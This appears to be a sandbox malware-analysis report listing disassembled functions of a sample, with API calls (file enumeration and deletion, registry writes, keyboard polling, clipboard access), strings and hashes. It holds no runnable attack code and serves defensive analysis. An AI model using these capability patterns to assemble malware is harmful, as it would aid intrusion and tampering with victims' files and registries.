Opcode Fuzzy Hash: 4eed4b692945bc9b6924cb2ca5504dceb853df1d249bc017e3ce7fd09e757316
Instruction Fuzzy Hash: 6C817B71C1120AAFDF119FA4DD49AEEBBB9EF05304F14816AFD15A2261DF318E24DB60

Function 002BC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002BC78D
FindClose.KERNEL32(00000000), ref: 002BC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 002BC844
__swprintf.LIBCMT ref: 002BC890
__swprintf.LIBCMT ref: 002BC8D3

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

__swprintf.LIBCMT ref: 002BC927

Part of subcall function 00273698: __woutput_l.LIBCMT ref: 002736F1

__swprintf.LIBCMT ref: 002BC975

Part of subcall function 00273698: __flsbuf.LIBCMT ref: 00273713
Part of subcall function 00273698: __flsbuf.LIBCMT ref: 0027372B

__swprintf.LIBCMT ref: 002BC9C4
__swprintf.LIBCMT ref: 002BCA13
__swprintf.LIBCMT ref: 002BCA62

Strings

%02d, xrefs: 002BC91B, 002BC925, 002BC973, 002BC9C2, 002BCA11, 002BCA60
%4d, xrefs: 002BC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 002BC88A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
Instruction ID: a45bc348643dbdf815cc3da61dbab6b43ce552e10445d99d340e440a6456c27f
Opcode Fuzzy Hash: 5ce33659010c2f9345eb47e2d72955625fd1986aac590fd1fccdd74ff6e17cef
Instruction Fuzzy Hash: 98A13CB2429304ABC704EFA4C886DAFB7ECBF94701F404919F985C6191EB34DA58CF66

Function 002BEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BEFB6
_wcscmp.LIBCMT ref: 002BEFCB
_wcscmp.LIBCMT ref: 002BEFE2
GetFileAttributesW.KERNEL32(?), ref: 002BEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 002BF00E
FindNextFileW.KERNEL32(00000000,?), ref: 002BF026
FindClose.KERNEL32(00000000), ref: 002BF031
FindFirstFileW.KERNEL32(*.*,?), ref: 002BF04D
_wcscmp.LIBCMT ref: 002BF074
_wcscmp.LIBCMT ref: 002BF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 002BF09D
SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF0C5
FindClose.KERNEL32(00000000), ref: 002BF0D2
FindClose.KERNEL32(00000000), ref: 002BF0E4

Strings

*.*, xrefs: 002BF048

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
Instruction ID: baa611e6f9344e20b955ef3db7eaaa33e4ac5ddba27d609573cad4533abf4da3
Opcode Fuzzy Hash: 6266a726486589a4bd8f02e278f4276a3f48a31e8048673d4d585b87665d21d8
Instruction Fuzzy Hash: A83116329112096ACB90EFB4ED4CAEE77AC9F483A0F144572E845E20A1EB70DE50CE54

Function 002D0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,002DF910,00000000,?,00000000,?,?), ref: 002D09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D0A92
RegCloseKey.ADVAPI32(?), ref: 002D0DB2
RegCloseKey.ADVAPI32(00000000), ref: 002D0DBF

Strings

REG_DWORD, xrefs: 002D0C83
REG_QWORD, xrefs: 002D0D00
REG_BINARY, xrefs: 002D0D4D
REG_SZ, xrefs: 002D0AD0
REG_EXPAND_SZ, xrefs: 002D0A2F
REG_MULTI_SZ, xrefs: 002D0B7A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 3cb87cceeae1aba17c1a5c2bc46e2bc408960a6c20ec8f16fe99ba7272090667
Instruction ID: b197ca8e18e5866096f9118f77658f18969d21f06c9182bf9c7dd298e478e7d9
Opcode Fuzzy Hash: 3cb87cceeae1aba17c1a5c2bc46e2bc408960a6c20ec8f16fe99ba7272090667
Instruction Fuzzy Hash: D50249756206019FCB54EF14C895E2AB7E5EF89314F04845EF88A9B3A2CB30ED65CF85

Function 002666E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 002A11FC
0D/, xrefs: 00266733
ANYCRLF), xrefs: 002A12FB
NO_AUTO_POSSESS), xrefs: 002A112E
LF), xrefs: 002A12A4
BSR_ANYCRLF), xrefs: 002A131E
0E/, xrefs: 0026673D
_&, xrefs: 002A1465, 002A150C, 002A15B4
BSR_UNICODE), xrefs: 002A1338
ANY), xrefs: 002A12DE
LIMIT_MATCH=, xrefs: 002A1170
UCP), xrefs: 002A110D
UTF16), xrefs: 002A10CF
3c&, xrefs: 002668FF
CRLF), xrefs: 002A12C1
CR), xrefs: 002A1287
NO_START_OPT), xrefs: 002A114F
0F/, xrefs: 00266747
UTF), xrefs: 002A10FA
pG/, xrefs: 00266751

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID: 0D/$0E/$0F/$3c&$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG/$_&
API String ID: 0-303758664
Opcode ID: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
Instruction ID: 276810a246fbd7d00cadf4a4b50f6f6468d20f3d2487d9da44b378cd321a38b9
Opcode Fuzzy Hash: fc2ae018e024eca97284d92cc3c81209059b0263065a40dfa1e3e9840ed61a2d
Instruction Fuzzy Hash: 8D727075E20219DBDF14CF58C8447AEB7B5FF45320F1481AAE909EB290EB709DA1CB90

Function 002BF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BF113
_wcscmp.LIBCMT ref: 002BF128
_wcscmp.LIBCMT ref: 002BF13F

Part of subcall function 002B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B43A0

FindNextFileW.KERNEL32(00000000,?), ref: 002BF16E
FindClose.KERNEL32(00000000), ref: 002BF179
FindFirstFileW.KERNEL32(*.*,?), ref: 002BF195
_wcscmp.LIBCMT ref: 002BF1BC
_wcscmp.LIBCMT ref: 002BF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 002BF1E5
SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF20D
FindClose.KERNEL32(00000000), ref: 002BF21A
FindClose.KERNEL32(00000000), ref: 002BF22C

Strings

*.*, xrefs: 002BF190

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
Instruction ID: e1e3d4a7d2d87ec3b66f11922ecbd4bcded80700487fd5792c3ad8cf2ff2b909
Opcode Fuzzy Hash: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
Instruction Fuzzy Hash: 1131183691121A7ACB50EF74ED49EEE77AC9F493A0F104172EC44E20A0DB30DE65CE58

Function 002BA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA20F
__swprintf.LIBCMT ref: 002BA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA293
_memset.LIBCMT ref: 002BA2B2
_wcsncpy.LIBCMT ref: 002BA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA323
CloseHandle.KERNEL32(00000000), ref: 002BA32E
RemoveDirectoryW.KERNEL32(?), ref: 002BA337
CloseHandle.KERNEL32(00000000), ref: 002BA341

Strings

:, xrefs: 002BA252
\??\%s, xrefs: 002BA22B
\, xrefs: 002BA247

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 90fc25df0f2603f4c87cb3307b4cbe8186c0b6b381d5a0c722d2331c17febb34
Instruction ID: 4885ac28d750120fc84f5095c2d71c931cedc43a7830c0b481f41b79ccf381eb
Opcode Fuzzy Hash: 90fc25df0f2603f4c87cb3307b4cbe8186c0b6b381d5a0c722d2331c17febb34
Instruction Fuzzy Hash: 0E31B4B191014AABDB21DFA4DC49FEB37BCEF89740F1441B6F909D2160EB709B548B25

Function 002B001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002B0097
SetKeyboardState.USER32(?), ref: 002B0102
GetAsyncKeyState.USER32(000000A0), ref: 002B0122
GetKeyState.USER32(000000A0), ref: 002B0139
GetAsyncKeyState.USER32(000000A1), ref: 002B0168
GetKeyState.USER32(000000A1), ref: 002B0179
GetAsyncKeyState.USER32(00000011), ref: 002B01A5
GetKeyState.USER32(00000011), ref: 002B01B3
GetAsyncKeyState.USER32(00000012), ref: 002B01DC
GetKeyState.USER32(00000012), ref: 002B01EA
GetAsyncKeyState.USER32(0000005B), ref: 002B0213
GetKeyState.USER32(0000005B), ref: 002B0221

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
Instruction ID: 339b3f95cf062268819ccefe475c162430181db02f6c5dc0d7b45869bc533c30
Opcode Fuzzy Hash: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
Instruction Fuzzy Hash: DA510E2091438919FB36EFA488947EBBFB49F013C0F48459A89C6561C3DA54AB9CCB61

Function 002D03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D04AC

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0822
RegCloseKey.ADVAPI32(00000000), ref: 002D082F

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 0118bd78f115f751d061be55a10646f814cee2b0b1b6f6268145729abe21964d
Instruction ID: 1a2b65f91cb11375ac0517ba1156c6a24c054188c5e2050309c90b7508724d2a
Opcode Fuzzy Hash: 0118bd78f115f751d061be55a10646f814cee2b0b1b6f6268145729abe21964d
Instruction Fuzzy Hash: 9DE14C31614201AFCB14DF24C995E2ABBE8EF89314F04856EF84ADB361DA30ED55CF92

Function 002C83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

CoInitialize.OLE32 ref: 002C8403
CoUninitialize.OLE32 ref: 002C840E
CoCreateInstance.OLE32(?,00000000,00000017,002E2BEC,?), ref: 002C846E
IIDFromString.OLE32(?,?), ref: 002C84E1
VariantInit.OLEAUT32(?), ref: 002C857B
VariantClear.OLEAUT32(?), ref: 002C85DC

Strings

Failed to create object, xrefs: 002C8479, 002C852F
NULL Pointer assignment, xrefs: 002C84B3
Invalid parameter, xrefs: 002C84FA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 233e189040627c1caaa59e5f06cf6a71f55af80b9f1eb2820a7027fffa8ef4c1
Instruction ID: 34220ed93671c733f339f7df2a74d5aed130008279446cc97b191d212b8357c6
Opcode Fuzzy Hash: 233e189040627c1caaa59e5f06cf6a71f55af80b9f1eb2820a7027fffa8ef4c1
Instruction Fuzzy Hash: 1761C070628312DFC710DF14D848F6AB7E8AF49754F448A1DF9869B291CBB0ED58CB92

Function 002C4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 002C418B
EmptyClipboard.USER32 ref: 002C4191
GlobalAlloc.KERNEL32(00000002,?), ref: 002C41A6
CloseClipboard.USER32 ref: 002C4245

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c57d973874d4fb8e2f4d04ab1f3b473f3557a902e464ccba07c16ac1917b6aba
Instruction ID: fa4c83d7b2ef6c418f29d8f7205998a56a575d65d0c437bb51121b49964feb94
Opcode Fuzzy Hash: c57d973874d4fb8e2f4d04ab1f3b473f3557a902e464ccba07c16ac1917b6aba
Instruction Fuzzy Hash: BB21AD356122109FDB10AF20ED1DF6A7BA8EF44311F04802AFD469B2A1DB70ED50CF89

Function 002B37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770

Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32

FindFirstFileW.KERNEL32(?,?), ref: 002B38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B394B
MoveFileW.KERNEL32(?,?), ref: 002B395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 002B399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B39B9

Strings

\*.*, xrefs: 002B384E, 002B3857, 002B386C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 70444dfae57da43b75b5cdadb32957e5e6b86fad370db9426edcd74c556a8ff6
Instruction ID: a6a7599b8ec14eaf56dad3e9873166493ce05e7446106deb48724f88c158d824
Opcode Fuzzy Hash: 70444dfae57da43b75b5cdadb32957e5e6b86fad370db9426edcd74c556a8ff6
Instruction Fuzzy Hash: 24518D3182514DAACF01EBA0DA929FDB778AF14341F604069E802771A2EF316F2DCF65

Function 002BF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BF440
Sleep.KERNEL32(0000000A), ref: 002BF470
_wcscmp.LIBCMT ref: 002BF484
_wcscmp.LIBCMT ref: 002BF49F
FindNextFileW.KERNEL32(?,?), ref: 002BF53D
FindClose.KERNEL32(00000000), ref: 002BF553

Strings

*.*, xrefs: 002BF425

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 4161a2664e4a02bec56de9a5951abfd606c7dbded5a8dd268443c2bd44abec42
Instruction ID: 082d74a5fb245f4b76e2befcdff76ef3400b8a2a85e593a28ab5b63aab7dde44
Opcode Fuzzy Hash: 4161a2664e4a02bec56de9a5951abfd606c7dbded5a8dd268443c2bd44abec42
Instruction Fuzzy Hash: 2041B17182021AAFCF90DF64DD49AEEBBB4FF05350F544066E815A3191EB309E64CF94

Function 00263030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3c&, xrefs: 00263225
_&, xrefs: 00263322

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c&$_&
API String ID: 674341424-1388094336
Opcode ID: 1ad3e995352208cc2d2cf5fad66282fdc5cdf4f51877c32a894dcb880fc827d1
Instruction ID: 872db56d419d2680007cb578047565e32805193138434de91fb57a025421ab12
Opcode Fuzzy Hash: 1ad3e995352208cc2d2cf5fad66282fdc5cdf4f51877c32a894dcb880fc827d1
Instruction Fuzzy Hash: E6229D716283019FCB24DF24C885B6EB7E4BF84314F14491DF89A97291DB71E9A8CF92

Function 00265760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002658A5
_memmove.LIBCMT ref: 002658F5
_memmove.LIBCMT ref: 0026595B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 91a08412c69cbe993064ff24c7d959a555b1758fa687b60e723fa1b7b70b6529
Instruction ID: 8018a2385ffe9131fb488d475a7b4e2eadf17f603ff3e8e6b2c2ae147983ac6f
Opcode Fuzzy Hash: 91a08412c69cbe993064ff24c7d959a555b1758fa687b60e723fa1b7b70b6529
Instruction Fuzzy Hash: 93129B70A2061ADFDF04DFA5D981AAEB3F5FF48300F104529E806A7291EB35AD64CB94

Function 002B3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770

Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32

FindFirstFileW.KERNEL32(?,?), ref: 002B3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 002B3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 002B3BEA
FindClose.KERNEL32(00000000), ref: 002B3C01
FindClose.KERNEL32(00000000), ref: 002B3C0A

Strings

\*.*, xrefs: 002B3B5B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

